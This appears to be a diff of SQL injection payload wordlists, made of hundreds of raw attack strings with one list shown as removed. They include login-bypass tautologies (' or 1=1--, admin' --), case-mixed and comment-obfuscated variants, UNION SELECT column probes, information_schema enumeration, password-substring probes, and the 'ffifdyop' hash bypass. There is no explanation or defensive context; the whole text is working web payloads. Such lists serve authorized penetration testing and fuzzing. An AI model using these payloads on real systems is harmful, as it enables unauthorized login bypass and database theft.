')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
